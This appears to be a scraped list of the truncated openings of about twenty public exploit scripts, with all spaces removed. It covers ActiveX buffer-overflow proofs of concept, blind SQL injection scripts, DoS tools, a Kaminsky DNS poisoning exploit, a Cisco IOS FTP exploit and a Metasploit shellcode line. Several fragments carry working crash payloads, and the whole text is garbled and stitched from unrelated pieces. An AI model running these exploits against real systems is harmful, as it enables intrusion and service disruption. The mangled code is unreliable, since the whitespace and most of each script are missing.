#!/usr/bin/python"""OracleInternetDirectory10.1.4preauthenticationDenialOfServiceNOTES:Under32bitsplatformsitcrashesimmediately.Under64bitsitmaytakeevenhours.Sometimesyouneed2shootstocrashOID
<html><body><objectid=targetclassid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object><scriptlanguage=vbscript>arg1=String(10000,"A")target.StartURL(arg1)&
#/usr/bin/perl#||Author:GoLd_M#--//-->#--AlstraSoftArticleManagerProBlindSQLInjectionExploit--#--//-->Exploit:usestrict;useLWP::Simple;print"--------------------------
#//BeaWeblogic--ApacheConnectorRemoteExploit-1day#//ShouldstackbreaklatestWindowsServer2003<addressspacerandomization>#//BIGTHANKSTO#//"dong-hunyou"(Xpl017Elz)inINetCop-forhispaper#//"T
#include<stdio.h>#include<stdlib.h>#include<sys/socket.h>#include<sys/types.h>#include<netinet/in.h>#include<string.h>#include<malloc.h>#inclu
<!--DocumentImagingSDKBufferOverflowVulnerabilityDoSProofofconceptAuthor:r0ut3rMail:writ3r[at]gmail.com------------------------------TestedonWinXPProSP2Version:10.95Vendor:
YahooMessenger8.1(latest)RemoteDoSSafeforScripting,SafeforInitialize<html><body><objectid=targetclassid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object><scriptlanguage=vbscr
#!/usr/bin/perl#SimpleDNSPlus5.0/4.1<remoteDenialofServiceexploit##usage:sdns-dos.pl<dnsserver><dnssourceport><numofpackets>#ExploitwrittenbyExodus.#http://www.blackhat.org.iluseIO
-----------------------------------------------------------------------------NCTsoftAudFile.dllActiveXControlRemoteBufferOverflowurl:http://www.nctsoft.comAuthor:shinnaimail:shinnai[at]autistici[dot]orgsite:http://www.shi
#!/usr/bin/perl-wuseLWP::UserAgent;useMIME::Base64;useDigest::MD5qw(md5_hex);useGetopt::Std;getopts('h:',%args);print"#############################################n";print"#Pligg<=9.9Remo
#!/usr/bin/perl#k`sOSe-07/29/2008usewarnings;usestrict;#http://www.metasploit.com#EXITFUNC=seh,CMD=c:WINDOWSsystem32calc.exe#[*]x86/shikata_ga_naisucceeded,finalsize169my$shellcode="xd9xcaxd9x74x24xf4x5
#!/usr/bin/perl#/-----------------------------------------------#|/-----------------------------------------|#||RemoteSQLExploit||#||eNdonesia8.4RemoteSQLExploit||#||www.endonesia.o
<?php@session_start();?><tablealign=centerwidth=72%height=95%><tr><td><?php/*HIOXRandomAd1.3ArbitraryAddAdminUserVulnerability[~]Discoverd&exploitedbyStack[~]GreeatzAll
<?php@session_start();?><tablealign=centerwidth=72%height=95%><tr><td><?php/*HIOXBrowserStatistics2.0ArbitraryAddAdminUserVulnerability[~]Discoverd&exploitedbyStack[~]G
/*CiscoIOSFTPserverremoteexploitbyAndyDavis2008CiscoAdvisoryID:cisco-sa-20070509-iosftp-May2007
#!/usr/bin/perl######################################################################################e107PluginBLOGEnginev2.2BlindSQLInjectionExploit##..::virangarsecurityte
#Author:__GiReX__26/07/08#Homepage:girex.altervista.org#CMS:IceBB<=1.0-RC9.2#Site:icebb.net#Bug:BlindSQLInjection#Exploit:SessionHijackingPoC#Worksregardlessofphp.inisettings#Description:
<!--TrendMicroOfficeScanObjRemoveCtrlActiveXControlBufferOverflowExploitwrittenbye.b.TestedonWindowsXPSP2(fullypatched)English,IE6IE7,OfficeScan7.3patch4,OfficeScanRemoveCtrl.dllversion7.3.0.1020Thecont
/**ExploitforCVE-2008-1447-KaminskyDNSCachePoisoningAttack**Compilation:*$gcc-okaminsky-attackkaminsky-attack.c`dnet-config--libs`-lm**Dependency:libdnet(akalibdumbnet-devunderUbuntu)**Author:
/*MicrosoftAccessSnapshotViewerActiveXControlExploitMs-AceesSnapShotExploitSnapview.ocxv10.0.5529.0DownloadnicebinariesintoanarbitraryboxVulnerabilitydiscoveredbyOliverLaveryhttp://www.securityfocus.